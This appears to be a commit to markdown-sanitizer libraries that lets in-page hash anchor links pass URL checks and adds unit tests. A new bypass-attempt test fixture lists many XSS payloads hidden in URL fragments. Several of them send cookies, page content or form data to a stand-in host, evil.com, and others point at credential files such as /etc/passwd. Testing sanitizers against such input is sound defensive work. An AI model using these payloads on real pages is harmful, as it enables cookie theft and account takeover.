Allow non-malicious anchor links (#25)

haydenbleasel · web-flow · commit cf5b5bbd8ad0 · 2025-10-10T09:50:52.000-07:00
* Allow non-malicious links starting with hash

* Update tests

* Create wet-kings-carry.md

* Update wet-kings-carry.md

* Resolve feedback, allow all hash links

* Fix unit tests

* Update bypass-attempts.test.ts

* Create 211-hash-fragment-exploitation.md

* Resolve comment

* Restore deleted bypass examples
diff --git a/.changeset/wet-kings-carry.md b/.changeset/wet-kings-carry.md
@@ -0,0 +1,7 @@
+---
+"rehype-harden": patch
+"markdown-to-markdown-sanitizer": patch
+"harden-react-markdown": patch
+---
+
+Allow hash-only anchor links (e.g. `#section`) without requiring a matching allowed link prefix
diff --git a/markdown-to-markdown-sanitizer/src/url-normalizer.ts b/markdown-to-markdown-sanitizer/src/url-normalizer.ts
@@ -90,6 +90,15 @@ export class UrlNormalizer {
   }
 
   sanitizeUrl(url: string, type: "href" | "src"): string {
+    // Allow hash-only (fragment-only) URLs for links - they navigate within the current page
+    if (type === "href" && url.startsWith("#")) {
+      const parsedURL = tryParseUrl(url, this.options.defaultLinkOrigin || this.options.defaultOrigin);
+      if (parsedURL && parsedURL.hash === url) {
+        return url;
+      }
+      // If it's not a valid hash-only URL, fall through to normal validation
+    }
+
     const normalizedUrl = this.normalizeUrl(
       url,
       type === "src"
diff --git a/markdown-to-markdown-sanitizer/tests/basic-sanitization.test.ts b/markdown-to-markdown-sanitizer/tests/basic-sanitization.test.ts
@@ -15,6 +15,41 @@ describe("Basic Markdown Sanitization", () => {
   };
 
   describe("Link Sanitization", () => {
+    test("allows hash-only anchor links without requiring prefixes", () => {
+      const input = "[Jump to section](#hero)";
+      const result = sanitize(input, {
+        allowedLinkPrefixes: ["https://example.com/blog"],
+      });
+      expect(result).toBe("[Jump to section](#hero)\n");
+    });
+
+    test("allows hash-only anchor links even with no allowed prefixes", () => {
+      const input = "[Jump to top](#top)";
+      const result = sanitize(input, {
+        allowedLinkPrefixes: [],
+      });
+      expect(result).toBe("[Jump to top](#top)\n");
+    });
+
+    test("safely handles hash fragments that look malicious but are just fragments", () => {
+      // When markdown is parsed, #javascript:alert('xss') is treated as a fragment identifier
+      // Hash-only URLs are allowed because they're just in-page navigation, not executable code
+      const input = "[Click me](#javascript:alert('xss'))";
+      const result = sanitize(input);
+      // Hash fragments are preserved as-is since they're safe fragment identifiers
+      // Parentheses are markdown-escaped rather than URL-encoded
+      expect(result).toBe("[Click me](#javascript:alert\\('xss'\\))\n");
+    });
+
+    test("safely handles hash fragments with data: pattern", () => {
+      // Similar to above - these are just fragment identifiers, not data: URLs
+      // Hash-only URLs starting with # are preserved as safe in-page navigation
+      const input = "[Click me](#data:text/html,<script>alert('xss')</script>)";
+      const result = sanitize(input);
+      // Angle brackets are percent-encoded; parentheses are markdown-escaped rather than URL-encoded
+      expect(result).toBe("[Click me](#data:text/html,%3Cscript%3Ealert\\('xss'\\)%3C/script%3E)\n");
+    });
+
     test("allows trusted links", () => {
       const input = "[Click here](https://example.com/page)";
       const result = sanitize(input);
diff --git a/markdown-to-markdown-sanitizer/tests/bypass-attempts.test.ts b/markdown-to-markdown-sanitizer/tests/bypass-attempts.test.ts
@@ -224,6 +224,12 @@ describe("Markdown Sanitizer Bypass Attempts", () => {
       return false;
     }
 
+    // Allow hash-only fragments (in-page navigation)
+    // These are safe because they're just fragment identifiers, not executable URLs
+    if (url.startsWith("#")) {
+      return false;
+    }
+
     try {
       const parsedUrl = new URL(url);
 
diff --git a/markdown-to-markdown-sanitizer/tests/bypass-attempts/211-hash-fragment-exploitation.md b/markdown-to-markdown-sanitizer/tests/bypass-attempts/211-hash-fragment-exploitation.md
@@ -0,0 +1,114 @@
+# Hash Fragment Exploitation Attempts
+
+## Direct javascript: protocol in fragments
+[Click me](#javascript:alert('xss'))
+[Execute](#javascript:void(window.location='https://evil.com'))
+[Steal](#javascript:document.write('<img src=//evil.com?c='+document.cookie+'>'))
+
+## data: protocol patterns in fragments
+[View](#data:text/html,<script>alert('xss')</script>)
+[Load](#data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=)
+[Exec](#data:application/javascript,alert('xss'))
+
+## vbscript: and other script protocols in fragments
+[VBS](#vbscript:msgbox("xss"))
+[LiveScript](#livescript:alert('xss'))
+[JScript](#jscript:alert('xss'))
+
+## Protocol confusion with fragments
+[Confuse](#javascript:alert(1)//https://safe.com)
+[Fake](#https://safe.com#javascript:alert(1))
+[Mixed](#//safe.com#javascript:alert(1))
+
+## Fragment with embedded redirects
+[Redirect](#javascript:location='https://evil.com')
+[Navigate](#javascript:window.location.href='https://evil.com')
+[Open](#javascript:window.open('https://evil.com'))
+
+## Encoded dangerous fragments
+[URL encoded](#javascript%3Aalert%28%27xss%27%29)
+[Double encoded](#javascript%253Aalert%2528%2527xss%2527%2529)
+[HTML entities](#javascript&colon;alert&lpar;&apos;xss&apos;&rpar;)
+[Unicode](#java\u0073cript:alert('xss'))
+
+## Fragment that looks safe but contains attacks
+[Safe link?](#user-profile?id=123&callback=javascript:alert(1))
+[API call?](#/api/endpoint?code=javascript:alert(1))
+[Anchor](#section#javascript:alert(1))
+
+## Null byte and special character injection
+[Null](#safe\x00javascript:alert(1))
+[Tab](#safe\tjavascript:alert(1))
+[Newline](#safe%0Ajavascript:alert(1))
+[Carriage return](#safe%0Djavascript:alert(1))
+
+## Fragments with HTML injection attempts
+[HTML](#<img src=x onerror=alert('xss')>)
+[Script tag](#<script>alert('xss')</script>)
+[SVG](#<svg/onload=alert('xss')>)
+[Style](#<style>@import'javascript:alert(1)'</style>)
+
+## Fragments designed to exploit JS fragment navigation
+[Hash nav](#javascript:alert(1)#safe)
+[Multiple hashes](#safe##javascript:alert(1))
+[Hash encoding](#%23javascript:alert(1))
+
+## Social engineering with deceptive fragments
+[Download PDF](#javascript:alert('This looks like a safe download'))
+[View Image](#data:text/html,<h1>Click here to view</h1><script>alert(1)</script>)
+[Open Document](#javascript:void(prompt('Enter password:')))
+
+## Fragments with protocol smuggling
+[Smuggle](#javascript:/**/alert(1))
+[Comment](#javascript://comment%0Aalert(1))
+[Whitespace](#javascript:   alert(1))
+[Tab separated](#javascript:	alert(1))
+
+## Fragments attempting to break parsing
+[Nested](#javascript:eval('#javascript:alert(1)'))
+[Recursive](#javascript:location.hash='#javascript:alert(1)')
+[Self-ref](#javascript:window.location='#'+window.location.hash)
+
+## Browser-specific fragment exploits
+[Chrome](#chrome://settings)
+[Firefox](#about:config)
+[Edge](#edge://settings)
+[Safari](#safari://settings)
+
+## File protocol in fragments
+[File](#file:///etc/passwd)
+[Local](#file://c:/windows/system32/config/sam)
+[Network](#file://attacker.com/share/malware.exe)
+
+## Fragment with data exfiltration patterns
+[Exfil](#javascript:fetch('https://evil.com?d='+btoa(document.body.innerHTML)))
+[Cookie steal](#javascript:navigator.sendBeacon('https://evil.com',document.cookie))
+[Form data](#javascript:new Image().src='https://evil.com?'+document.forms[0].serialize())
+
+## Fragments attempting DOM clobbering
+[Clobber](#javascript:document.body.innerHTML='<form name=location><input name=href></form>')
+[Override](#javascript:Object.defineProperty(window,'location',{value:{href:'https://evil.com'}}))
+
+## Fragments with timing attacks
+[Timing](#javascript:setTimeout(alert,1000))
+[Interval](#javascript:setInterval(()=>fetch('https://evil.com'),1000))
+[Async](#javascript:Promise.resolve().then(()=>alert(1)))
+
+## Fragments attempting to exploit markdown renderers
+[MD exploit](#javascript:');//';alert(1);//')
+[Template](#javascript:${alert(1)})
+[Interpolation](#javascript:`${alert(1)}`')
+
+## Fragments with CRLF injection
+[CRLF](#safe%0D%0ALocation:%20javascript:alert(1))
+[Header inj](#safe%0D%0AContent-Type:%20text/html%0D%0A%0D%0A<script>alert(1)</script>)
+
+## Fragments attempting to exploit URL parsers
+[Parser conf](#javascript:alert(1)?#safe)
+[Query in frag](#safe?callback=javascript:alert(1)#)
+[Authority](#javascript://safe.com@evil.com/alert(1))
+
+## Fragments with polyglot payloads
+[Polyglot](#javascript:/*<script>*/alert(1)/*/</script>)
+[Multi-context](#javascript:'"-alert(1)-"')
+[Triple encoded](#javascript:%25%36%38%25%37%34%25%37%34%25%37%30)
diff --git a/rehype-harden/src/index.ts b/rehype-harden/src/index.ts
@@ -83,6 +83,15 @@ function transformUrl(
 ): string | null {
   if (!url) return null;
 
+  // Allow hash-only (fragment-only) URLs for links (not images) - they navigate within the current page
+  if (typeof url === "string" && url.startsWith("#") && !isImage) {
+    const parsedURL = parseUrl(url, defaultOrigin);
+    if (parsedURL && parsedURL.hash === url) {
+      return url;
+    }
+    // If it's not a valid hash-only URL, fall through to normal validation
+  }
+
   // Handle data: URLs for images if allowDataImages is enabled
   if (typeof url === "string" && url.startsWith("data:")) {
     // Only allow data: URLs for images when explicitly enabled
diff --git a/rehype-harden/src/tests/index.test.ts b/rehype-harden/src/tests/index.test.ts
@@ -171,6 +171,30 @@ describe("rehype-harden", () => {
   });
 
   describe("URL transformation", () => {
+    it("allows hash-only anchor links without requiring prefixes", async () => {
+      const tree = await processMarkdown("[Jump to section](#hero)", {
+        defaultOrigin: "https://example.com",
+        allowedLinkPrefixes: ["https://example.com/blog"],
+      });
+
+      const link = findElement(tree, "a");
+      expect(link).not.toBeNull();
+      expect(link!.properties.href).toBe("#hero");
+      expect(link!.properties.target).toBe("_blank");
+      expect(link!.properties.rel).toBe("noopener noreferrer");
+    });
+
+    it("allows hash-only anchor links even with no allowed prefixes", async () => {
+      const tree = await processMarkdown("[Jump to top](#top)", {
+        defaultOrigin: "https://example.com",
+        allowedLinkPrefixes: [],
+      });
+
+      const link = findElement(tree, "a");
+      expect(link).not.toBeNull();
+      expect(link!.properties.href).toBe("#top");
+    });
+
     it("preserves relative URLs when input is relative and allowed", async () => {
       const tree = await processMarkdown("[Test](/path/to/page?query=1#hash)", {
         defaultOrigin: "https://example.com",